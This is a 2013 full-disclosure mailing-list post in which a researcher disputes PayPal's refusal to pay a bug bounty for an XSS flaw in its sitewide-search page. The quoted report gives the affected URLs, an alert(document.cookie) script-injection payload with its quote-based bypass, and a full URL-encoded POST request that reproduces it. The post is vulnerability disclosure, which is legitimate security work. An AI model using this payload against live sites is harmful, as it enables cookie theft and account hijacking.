List:       full-disclosure
Subject:    [Full-disclosure] PayPal Bug Bounty Controversy - I found the XSS first: They still didn't pay me
From:       Shubham Shah <shahshubham369 () gmail ! com>
Date:       2013-05-29 14:38:16

[Attachment #2 (multipart/alternative)]

Heya everyone,
*On the 11th of May, 2013, I reported an XSS that affected the very same
field that Kugler reported, on the same domain of "paypal.com"* -
However, I too did not receive a bug bounty.
My name is Shubham Shah, also a security researcher. And coincidentally
but similarly to Robert Kugler. I too found a cross site scripting
vulnerability on PayPal's "sitewide-search" module. My exploit was
similar to his, it affected the same parameters except I had used an
alternate vector - after fiddling with the search system for some time.
The real controversy is however, I am *under 18 years old* and I, in the
past have received money from their program under my older siblings
PayPal account, with permission. When I reported the XSS pretty much the
same as Kugler reported, I was "not eligible for a bounty" because
"Another researcher already discovered the bug". Please take a look at
the attached emails and screenshots.

Here is what I sent to the Site Security team via their PGP portal:

To Paypal Site Security Team,
Recently I have discovered an XSS vulnerability which affects the wide majority of Paypal.com/* \
This XSS vulnerability is a POST type, on the affected script "searchscr?cmd=_sitewide-search" \
Affected domains: https://www.paypal.com/*/cgi-bin/searchscr?cmd=_sitewide-search
(The * indicates any country code)
for example:
https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/ie/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search
etc.

The XSS vector successfully executes on Internet Explorer and Firefox (newest builds). It does \
not execute on Chrome, but it is possible to create a custom vector to do so. If needed, I can \
create such a vector.

XSS Vector: '"<script >alert(document.cookie)</script> The bypass used is the ['"] in front of \
any HTML or script injection (without the square brackets)

This exploit has the capability of stealing a large number of user cookies in a short period of \
time with cookie stealers. If needed I can also provide a PoC for this. This can be done \
stealthily and would cause major mayhem if exploited!

Here is some proof of concept images:
http://pasteboard.co/2lU54Wuj.png  (PNG file hosted on pasteboard.co) - document.cookie xss on \
firefox

Here is my personal HTTP Headers for making this exploit execute:

POSThttps://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search  1.1
Host:www.paypal.com
locale_val=en_AU&qrystr_val=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&countst \
r_val=AU&serverame_val=www.paypal.com&searchResultUrlsCount_val=&queryString_acInput=%27%22%3Csc \
ript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&queryString=%27%22%3Cscript+%3Ealert%28documen \
t.cookie%29%3C%2Fscript%3E&buttonSearch=Search&beta_user=false&form_charset=UTF-8

Thank you for your time in reading this, Shubham Shah

Screenshots to prove date of submission and actual message:
http://pbrd.co/18ugpSY <= Date submitted proof
http://pbrd.co/18ugFRZ <= Proof of message

On 05/13/2013 7:47 AM I got told by paypal that:

Hi Shubham,

We regret to inform you that your bug submission was not eligible for a bounty for the \
following reason.  Another researcher already discovered the bug.

Thank you for your participation. We take pride in keeping PayPal the safer place for online \
payment.

Thank you,
PayPal Security Team

Once again, here are some screenshots:
http://pbrd.co/18uhtGD <= Proof of date I submitted it
http://pbrd.co/18uhMkI <= Proof of message - As I could not take a print
screen of the far right side, I included the barebones - print version
of the message - so others can verify the date I received the response.

Thanks for reading through,
I actually didn't get anything from PayPal similar to Robert, but I was
able to report the vulnerability 8 days earlier than Robert - and still
did not receive any acknowledgement.
Frankly, I was okay with it and moved on. I do not actually have much
against the bounty as I have been paid numerous times. PayPal has
honoured many of my vulnerabilities. However, I can tell you that
recently none of my security submissions have been honoured - they state
that all my newer submissions have been already reported - I have no
actual way of verifying if they have or not, so I just move on and
continue pentesting with spirit

Also, Robert, I am amazed by your work done with security regarding
Mozilla! They were awesome finds! Solid stuff man, I hope one day that I
can move onto learning more about application security.